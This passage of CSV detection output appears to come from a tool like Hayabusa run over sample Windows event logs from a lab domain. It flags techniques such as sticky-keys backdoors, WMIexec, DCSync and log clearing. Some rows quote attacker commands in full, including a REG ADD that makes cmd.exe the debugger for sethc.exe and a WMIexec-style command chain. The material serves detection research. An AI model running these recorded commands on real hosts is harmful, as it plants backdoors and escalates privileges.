Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:26:03.004 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:26:03.020 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 09:07:00.330 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User 
Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.330 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.331 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.331 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.331 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.331 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for 
delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.332 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.332 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:08:00.382 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 09:08:00.383 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 09:08:00.383 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 09:08:00.383 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User 
Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 09:08:00.383 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 09:08:00.384 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 09:16:14.118 +00:00,srvdefender01.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | CreateKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 09:16:14.119 +00:00,srvdefender01.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 
5D63072B-84DE-6086-7B49-000000000C00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 09:16:14.119 +00:00,srvdefender01.offsec.lan,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 09:16:14.119 +00:00,srvdefender01.offsec.lan,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 09:17:14.111 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /t REG_SZ /v Debugger /d ""C:\windows\system32\cmd.exe"" /f | Path: C:\Windows\System32\reg.exe | PID: 0x1b30 | User: admmig | LID: 0x2b5f6bf",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:17:14.111 +00:00,srvdefender01.offsec.lan,4688,high,Persis | PrivEsc,Suspicious Debugger Registration Cmdline,,rules/sigma/process_creation_builtin/proc_creation_win_install_reg_debugger_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg 
update + execution.evtx +2021-04-26 09:17:37.439 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\windows\system32\cmd.exe sethc.exe 211 | Path: C:\Windows\System32\cmd.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:17:37.439 +00:00,srvdefender01.offsec.lan,4688,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation_builtin/proc_creation_win_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:17:37.460 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:18:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1464 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:18:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script 
Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:18:03.033 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 10:04:23.189 +00:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx +2021-04-26 14:16:45.757 +00:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\seth2c.exe | Process: C:\Windows\system32\cmd.exe | PID: 1960 | PGUID: 7CF65FC7-C199-6086-520A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx +2021-04-26 14:16:45.757 +00:00,fs02.offsec.lan,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx +2021-04-26 14:16:47.267 +00:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\sethc.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3328 | PGUID: 
7CF65FC7-CAF6-6086-930A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx +2021-04-26 14:16:47.267 +00:00,fs02.offsec.lan,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx +2021-04-26 15:03:05.976 +00:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\execute.bat | Process: C:\Windows\system32\cmd.exe | PID: 3492 | PGUID: 7CF65FC7-D629-6086-B70A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID11,13-SMBexec service registration.evtx" +2021-04-26 15:03:05.992 +00:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | LID: 0x3e7 | PID: 3068 | PGUID: 7CF65FC7-D629-6086-B80A-000000002000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx +2021-04-26 15:16:03.001 
+00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1548 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:03.001 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:03.019 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:03.978 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:03.978 +00:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:03.992 
+00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:04.047 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\mmc.exe -Embedding | Path: C:\Windows\System32\mmc.exe | PID: 0xda4 | User: SRVDEFENDER01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:04.047 +00:00,srvdefender01.offsec.lan,4688,high,Exec,MMC20 Lateral Movement,,rules/sigma/process_creation_builtin/proc_creation_win_mmc20_lateral_movement.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:04.284 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 11:04:03.495 +00:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 11:04:03.497 +00:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC 
Sync,,rules/sigma/builtin/security/win_dcsync.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 11:04:03.502 +00:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 11:04:13.291 +00:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 11:04:53.341 +00:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 14:54:29.317 +00:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c301,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:54:31.493 +00:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee2c3d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:54:49.355 +00:00,webiis01.offsec.lan,5140,info,Collect,Network Share 
Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c901,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:54:51.591 +00:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee3135,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:28.669 +00:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2847721c,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:34.819 +00:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x74005fb3,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:45.042 +00:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb108529d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network 
Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:45.392 +00:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f93ef,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:46.789 +00:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd49db,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:47.449 +00:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204a9a12,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:48.746 +00:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x28477800,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:49.695 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 
0x62cbf9f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:50.629 +00:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f8ca7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:54.886 +00:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x740075dc,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:00:05.147 +00:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb1086cfb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:00:05.466 +00:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f9930,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 
15:00:06.878 +00:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd4ec6,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:00:07.557 +00:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204aa3a4,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:00:09.605 